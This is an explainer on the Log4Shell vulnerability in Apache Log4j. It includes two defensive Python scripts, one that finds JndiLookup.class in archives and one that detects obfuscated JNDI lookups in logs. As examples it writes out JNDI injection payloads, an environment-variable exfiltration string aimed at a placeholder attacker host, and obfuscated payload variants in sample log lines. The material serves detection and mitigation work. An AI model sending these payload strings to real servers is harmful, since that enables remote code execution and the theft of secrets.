What is Log4j
Logging is critical in software, and Log4j is the Apache logging library that a large share of Java applications use for it. Its behaviour is driven by a configuration file rather than by code: the log level can be raised or lowered (for example to turn on debugging in production) without changing or recompiling the source.
The standard levels, from most to least verbose, are ALL < TRACE < DEBUG < INFO < WARN < ERROR < FATAL < OFF, and switching between them is a one-line configuration change.
Log4j Security Vulnerability
The flaw (CVE-2021-44228, widely called Log4Shell) was reported to Apache on November 24, 2021, and there are reports of exploitation attempts before a fix was public. It came to broad public attention around December 10, 2021, when a proof of concept circulated; affected versions are log4j-core 2.0-beta9 through 2.14.1.
If you run Java software, there is a good chance you are exposed: Log4j is pulled into a large share of enterprise Java applications, often indirectly as a transitive dependency of some other library, so "we don't use Log4j" needs to be verified against the deployed artifacts rather than the source tree.
Log4j is one of the most widely used Java logging frameworks, so immediate action is needed: upgrade log4j-core to a fixed release (2.15.0 closed the original hole; 2.17.1 or later also covers the follow-up issues found in December 2021), or, where an upgrade is not yet possible, remove the JndiLookup class from the jar.
The attack requires little skill: a single crafted string in any input that ends up in a log message lets an attacker run arbitrary code on the vulnerable application, with that process's privileges. The consequences are as broad as whatever the process can reach.
There is strong evidence the vulnerability is being mass-scanned across the internet, as with earlier remote code execution (RCE) flaws; a comparable RCE in 2017 was being exploited within two days of disclosure.
Microsoft said “they have observed activities including installing coin miners, Cobalt Strike to enable credential theft and lateral movement, and exfiltrating data from compromised systems”.
As the threat grows, security experts warn that open-source software applications continue to be at risk. Kayla Underkoffler, senior security technologist at HackerOne, said “open-source software is behind nearly all modern digital infrastructure, with the average application using 528 different open-source components.”
What Are Hackers Exploiting?
According to Nozomi Networks' attack analysis, this is a “new zero-day vulnerability in the Apache Log4j logging utility that has been allowing easy-to-exploit remote code execution (RCE).” Attacker-controlled text that the application logs (a User-Agent header, a username, a chat message) can contain a lookup string such as ${jndi:ldap://attacker-host/a}; when Log4j formats the message it resolves the lookup, connects to the attacker's server, and on vulnerable JVM configurations loads and runs a class the server points to (or deserializes an attacker-supplied object).
The lookup is performed through JNDI (Java Naming and Directory Interface), which can be pointed at LDAP (Lightweight Directory Access Protocol), LDAPS, RMI (Java Remote Method Invocation) or DNS (Domain Name System) URLs. The LDAP and RMI variants are what pull in the remote payload. The DNS variant cannot load code, but it is used to confirm that a target is vulnerable and to exfiltrate data: the looked-up name is sent to the attacker's nameserver, and Log4j will happily expand something like ${env:AWS_SECRET_ACCESS_KEY}.attacker.example into that name first.
However, the nightmare of this threat lies elsewhere. Tim Mackey, principal security strategist at Synopsys Cybersecurity Research, said “The real problem with a Log4j attack at this point is that the attackers know patches are available and that most vulnerable systems are being updated as quickly as possible. This means that they can’t afford to carefully craft an attack and are far more likely to install or copy a piece of code that’ll lay dormant on the compromised system. When that dormant code is activated, that’s when we’ll see some of the more sophisticated attacks.”
How to Identify
Linux/Unix/macOS systems: the Fenrir IOC scanner runs locally as a bash script. It checks for known indicators of compromise, so pair it with a search for JndiLookup.class inside your JAR, WAR and EAR files to find the vulnerable library itself, not only traces of exploitation.
https://github.com/Neo23x0/Fenrir
Windows: you can use the following PowerShell script to search JAR files for JndiLookup.class:
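The PowerShell script referred to above is not reproduced on this page. As an added, cross-platform equivalent (Python written for this page, not the page's script and not an Apache tool), the following walks a directory tree, opens every .jar/.war/.ear/.zip, looks for JndiLookup.class including inside nested archives (a WAR carrying its own lib/ directory), and reads the log4j-core version from the Maven pom.properties that log4j-core jars ship with. The sample tree it builds in a temporary directory is constructed for the demo; the class bytes are placeholders, and the version thresholds in assess() encode the Log4j release history (2.15.0 first fix, 2.17.1 and the 2.12.2/2.3.1 backports).

```python
"""Find Log4j 2 archives that still ship JndiLookup.class, nested archives included.

Added example (not the page's PowerShell script). Assumes archives are ordinary
ZIP containers; nested .jar/.war/.ear members are opened in memory.
"""
import io
import os
import re
import tempfile
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")
MAX_NESTING = 5


def assess(version):
    """Classify a log4j-core version string (None when no pom.properties was found).

    JndiLookup.class only exists from 2.0-beta9 on, so its presence already means
    the archive is in the affected range unless the version says otherwise."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", version or "")
    if not m or int(m.group(1)) != 2:
        return "unknown version: JndiLookup.class present, treat as suspect"
    minor, patch = int(m.group(2)), int(m.group(3) or 0)
    if minor >= 17:
        return "2.17+: JndiLookup present but JNDI disabled by default"
    if (minor == 12 and patch >= 2) or (minor == 3 and patch >= 1):
        return "backport branch: patched for CVE-2021-44228, check for later point releases"
    if minor in (15, 16):
        return "2.15/2.16: initial fix applied, follow-up CVEs remain, upgrade"
    return "vulnerable (CVE-2021-44228)"


def inspect_archive(data, label, findings, depth=0):
    """Look for JndiLookup.class in one archive (bytes) and in any archive nested in it."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    with zf:
        names = set(zf.namelist())
        if JNDI_CLASS in names:
            version = None
            if POM_PROPS in names:
                for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                    if line.startswith("version="):
                        version = line.split("=", 1)[1].strip()
            findings.append((label, version, assess(version)))
        if depth < MAX_NESTING:
            for member in sorted(names):
                if member.lower().endswith(ARCHIVE_EXT):
                    inspect_archive(zf.read(member), label + "!" + member, findings, depth + 1)


def scan_tree(root):
    """Walk root and inspect every archive; labels are paths relative to root."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            if name.lower().endswith(ARCHIVE_EXT):
                path = os.path.join(dirpath, name)
                label = os.path.relpath(path, root).replace(os.sep, "/")
                with open(path, "rb") as fh:
                    inspect_archive(fh.read(), label, findings)
    return sorted(findings)


def _make_jar(entries):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


def build_sample_tree(root):
    """Constructed sample, not real artifacts: a vulnerable jar, a patched jar nested
    in a war, and an unrelated jar. Class contents are placeholder bytes."""
    os.makedirs(os.path.join(root, "lib"))
    vulnerable = _make_jar({JNDI_CLASS: b"\xca\xfe\xba\xbe", POM_PROPS: b"version=2.14.1\n"})
    patched = _make_jar({JNDI_CLASS: b"\xca\xfe\xba\xbe", POM_PROPS: b"version=2.17.1\n"})
    other = _make_jar({"org/example/Util.class": b"\xca\xfe\xba\xbe"})
    war = _make_jar({"WEB-INF/lib/log4j-core-2.17.1.jar": patched, "WEB-INF/web.xml": b"<web-app/>"})
    for relpath, data in [("lib/log4j-core-2.14.1.jar", vulnerable),
                          ("lib/commons-io-2.11.0.jar", other),
                          ("webapp.war", war)]:
        with open(os.path.join(root, relpath), "wb") as fh:
            fh.write(data)


def run_demo():
    """Build the constructed tree in a temp dir, scan it, return the findings."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return scan_tree(root)


if __name__ == "__main__":
    for archive, version, verdict in run_demo():
        print(f"{archive}: log4j-core {version or '?'} -> {verdict}")
```

Point scan_tree() at an application directory (or a whole filesystem; it only reads files whose names end in an archive extension). A missing pom.properties is reported as unknown rather than ignored, because vendors sometimes repackage log4j-core under another name, and the version check matters: 2.17.x still contains JndiLookup.class, so "class present" alone does not mean "vulnerable".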
How to Detect
You can use the Python script at the following link to check whether an HTTP server is potentially vulnerable to the Log4j 0-day RCE. It sends requests carrying JNDI lookup strings; a hit shows up as a callback to a host you control, so it only finds servers that actually log the injected fields, and a clean result is not proof that the library is patched:
https://gist.github.com/byt3bl33d3r/46661bc206d323e6770907d259e009b6
Firewall Mitigation
Based on expert analysis, attacks follow a common pattern. Attackers first identify that a system is vulnerable by scanning broad network ranges with requests containing the JNDI lookup string. A vulnerable system then connects to a second server named in that string to download the malicious payload. Attackers have been observed varying the text of the lookup (nested lookups such as ${${lower:j}ndi:...}, case changes, the ${name:-default} syntax, alternate protocols, URL encoding) to slip past signature-based detection, so detection must account for these variations rather than matching the literal string ${jndi:.
If the firewall only allows outbound connections to required destinations (internal DNS resolvers, update mirrors and the like) and drops everything else, a vulnerable server cannot complete the callback in the first place: the attacker sees no connection and may conclude the probe failed, and the server cannot fetch the second-stage payload. Two caveats apply. The server is still vulnerable, not fixed, so egress filtering buys time rather than replacing the patch. And if the permitted DNS resolver forwards to the internet, the dns: variant of the lookup (and the hostname resolution of any ldap: or rmi: URL) can still leak data in the queried name, so watch resolver logs for unusual lookups.
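The lookup mechanics described under "What Are Hackers Exploiting?" and the obfuscated variants described in this section come together in the following added example (Python written for this page; not code from the page, from Nozomi Networks, or from any other cited vendor). It undoes URL encoding, then collapses nested lookups from the inside out the way Log4j 2 evaluates them, which turns ${${lower:j}${upper:n}di:...} back into ${jndi:...} before a single regular expression is applied. Lookups a log scanner cannot evaluate (env:, sys:) are kept as <...> markers, so the output also shows what the attacker was trying to exfiltrate. The access-log lines are constructed for the demo, with RFC 5737 documentation addresses and .example hostnames.

```python
"""Find Log4Shell lookups in log lines, including obfuscated forms seen in the wild.

Added example, not code from the page or any cited vendor. Sample lines are constructed.
"""
import re
from urllib.parse import unquote

# An innermost ${...}: no other ${ or } inside it.
INNER = re.compile(r"\$\{([^${}]*)\}")
# Canonical form after normalization: ${jndi:<scheme>://<host[:port]>...}
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:\s*//([^/}\s]+)", re.IGNORECASE)


def _resolve(expr):
    """Evaluate one innermost lookup the way Log4j 2 would, as far as a scanner can.

    Returns None to leave the lookup untouched (the jndi lookup itself is what we
    want to see), otherwise the text Log4j would substitute for it."""
    kind, _, arg = expr.partition(":")
    kind = kind.strip().lower()
    if kind == "jndi":
        return None
    if ":-" in expr:                      # ${name:-default}: unknown name, default text wins
        return expr.split(":-", 1)[1]
    if kind == "lower":
        return arg.lower()
    if kind == "upper":
        return arg.upper()
    if kind == "date" and len(arg) >= 2 and arg[0] == arg[-1] == "'":
        return arg[1:-1]                  # ${date:'j'}: quoted SimpleDateFormat text is literal
    return "<" + expr + ">"               # env:, sys:, ...: cannot be resolved offline, mark it


def normalize_lookups(text, max_passes=20):
    """Undo URL encoding and collapse nested lookups from the inside out."""
    text = unquote(text)
    for _ in range(max_passes):
        changed = [False]

        def repl(m):
            out = _resolve(m.group(1))
            if out is None:
                return m.group(0)
            changed[0] = True
            return out

        text = INNER.sub(repl, text)
        if not changed[0]:
            break
    return text


def find_jndi(line):
    """Return (scheme, host[:port], normalized_line) for a JNDI lookup, else None."""
    norm = normalize_lookups(line)
    m = JNDI.search(norm)
    if not m:
        return None
    return m.group(1).lower(), m.group(2), norm


def scan_lines(lines):
    """Return (line_index, scheme, host) for every line that carries a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines):
        hit = find_jndi(line)
        if hit:
            hits.append((i, hit[0], hit[1]))
    return hits


# Constructed access-log lines: plain payload, nested-lookup obfuscation, default-value
# obfuscation with rmi:, a URL-encoded dns: exfiltration attempt, and one benign line.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:12:01:33 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${jndi:ldap://198.51.100.23:1389/a}"',
    '10.0.0.6 - - [10/Dec/2021:12:02:10 +0000] "GET /login HTTP/1.1" 200 891 "-" '
    '"${${lower:j}${upper:n}di:${lower:ldap}://203.0.113.9/x}"',
    '10.0.0.7 - - [10/Dec/2021:12:02:45 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${${env:NaN:-j}ndi${::-:}rmi://evil.example/obj}"',
    '10.0.0.8 - - [10/Dec/2021:12:03:01 +0000] "GET /?q=%24%7Bjndi%3Adns%3A%2F%2F'
    '${env:HOSTNAME}.exfil.example%7D HTTP/1.1" 200 33 "-" "curl/7.79.1"',
    '10.0.0.9 - - [10/Dec/2021:12:03:30 +0000] "GET /docs HTTP/1.1" 200 4021 "-" '
    '"Mozilla/5.0 (compatible; price is ${10})"',
]

if __name__ == "__main__":
    for idx, scheme, host in scan_lines(SAMPLE_LOG_LINES):
        print(f"line {idx}: jndi via {scheme} to {host}")
```

The design choice worth noting is that the matching happens after normalization rather than on the raw line: a signature that lists known obfuscations will always be one variant behind, while evaluating the lookup grammar the way the library does is stable against new spellings. The hostnames it extracts are what you hand to the firewall team and to your DNS logs, and the <env:...> markers tell you which secrets may already have left.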
What Happened in Canada
The Public Health Agency of Canada (PHAC) and Statistics Canada websites were temporarily taken offline, with some systems later restored in part. The government stated that extensive precautionary measures had been taken.
For more info: Canadian Centre for Cyber Security